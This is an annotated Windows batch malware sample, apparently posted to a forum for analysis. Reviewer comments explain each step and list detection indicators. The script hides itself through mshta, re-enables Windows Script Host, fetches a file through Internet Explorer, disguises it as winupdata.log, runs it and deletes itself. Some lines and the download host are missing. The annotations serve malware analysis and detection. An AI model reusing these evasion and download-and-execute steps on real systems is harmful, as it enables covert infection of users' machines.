rem Launcher stub of a batch sample posted to a forum for analysis: it relaunches
rem itself with no visible window before doing any work.
@echo off
rem Work from the per-user temp directory.
cd /d %tmp%
rem shel holds "msh" so that the word mshta never appears literally in the file;
rem presumably this is meant to defeat simple string matching, so detection
rem should key on the expanded process command line rather than on file content.
rem The second command tests for a marker argument: when it is present this is
rem the hidden second instance and control jumps to the hidedl label.
rem NOTE(review): no hidedl label is visible on this page; it was probably lost
rem when the script was pasted.
set shel=msh&if "%1"=="kyo_PE-win32shell_ping" goto hidedl
rem First (visible) instance: mshta evaluates an inline VBScript that starts this
rem same batch file again with the marker argument and window style 0 (hidden),
rem closes the mshta window, and then the visible instance exits.
rem Detection: mshta started with a vbscript: argument that calls wscript.shell
rem run is a well-known proxy-execution pattern (MITRE technique T1218.005, Mshta).
rem The Chinese text after exit is the forum poster's message ("please help
rem analyse!") fused onto this line by extraction; it is not part of the script.
%shel%ta vbscript:createobject("wscript.shell").run("""%~nx0"" kyo_PE-win32shell_ping",0)(window.close)&&exit帮忙分析!
附件: 样本.rar (2009-12-4 17:00:21, 18.34 K)
rem Main body of the sample: re-enable scripting, have Internet Explorer fetch a
rem file into the browser cache, copy that file out under a log-like name, run
rem it, then remove the staged copy and the script itself.
rem
rem Forces the machine-wide Windows Script Host switch to Enabled=1. The quoted
rem spaces spell the key name Windows Script Host. This undoes a hardening
rem setting, so a write to this value is worth alerting on.
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "Script" "Host\Settings /v Enabled /t REG_DWORD /d 1 /f
rem Reinstalls Windows Script Host from wsh.inf.
rem NOTE(review): the registered-trademark sign is almost certainly an HTML-entity
rem artefact of the forum page; the original most likely had a command separator
rem followed by regsvr32, silently (/s) re-registering the listed scripting and
rem browser DLLs. Confirm against the attached sample.
rundll32 setupapi,InstallHinfSection DefaultInstall 128 %windir%\\inf\\wsh.inf®svr32 scrrun.dll urlmon.dll shdocvw.dll jscript.dll vbscript.dll /s
rem Empties the current user's Internet Explorer cache, so that whatever appears
rem there afterwards was fetched by the next step.
rd /s /q "%userprofile%\Local Settings\Temporary Internet Files\Content.IE5"
rem Starts Internet Explorer through the same mshta and wscript.shell indirection
rem used by the launcher.
rem NOTE(review): this line is cut off on the page. The run call has no remaining
rem arguments, so the address the browser was pointed at and the window style
rem cannot be recovered from here.
start %shel%ta.exe vbscript:createobject("wscript.shell").run("""%ProgramFiles%\Internet Explorer\IEXPLORE.EXE""
rem ping is used only as a delay while the browser downloads.
rem NOTE(review): the target host is missing on the page, and the wait label
rem referenced below is not visible either; it presumably sat near this line.
ping -n 15
rem Looks under Documents and Settings for a cached file named QQOPlatform[1].gif
rem (the [1] suffix is how Internet Explorer names cached downloads), keeps the
rem listing line that mentions Content.IE5, and rebuilds the cache directory path
rem from its first six space-separated tokens into the variable way.
rem NOTE(review): this relies on the localized layout of dir output; confirm on
rem the locale the sample was built for.
for /f "tokens=1,2,3,4,5,6 delims= " %%1 in ('dir "%systemdrive%\Documents and Settings\QQOPlatform[1].gif" /s /a^|findstr /i "Content.IE5"') do set way=%%1 %%2 %%3 %%4 %%5 %%6
rem Renames the cached file so that it looks like an update log.
ren "%way%\QQOPlatform[1].gif" winupdata.log
rem If the rename worked, stages the file in the All Users application data
rem folder; otherwise jumps to the wait label to retry.
rem Indicators on this page: QQOPlatform[1].gif in the IE cache and winupdata.log
rem under All Users\Application Data.
if exist "%way%\winupdata.log" (copy "%way%\winupdata.log" "%systemdrive%\Documents and Settings\All Users\Application Data\winupdata.log" /y) else (goto wait)
rem Short delay (target host again missing on the page).
ping -n 2
rem Clears the browser cache a second time, removing the downloaded original.
rd /s /q "%userprofile%\Local Settings\Temporary Internet Files\Content.IE5"
rem Invokes the staged file.
rem NOTE(review): the page does not show what the file contains. The .gif and
rem .log names say nothing about its real type, so treat it as an executable
rem payload until the attached sample has been examined.
call "%systemdrive%\Documents and Settings\All Users\Application Data\winupdata.log"
rem Clean-up: deletes the staged file and then this script, so neither may be
rem left on disk for later triage. Process-creation and registry logs are the
rem more reliable evidence.
del "%systemdrive%\Documents and Settings\All Users\Application Data\winupdata.log"
del %0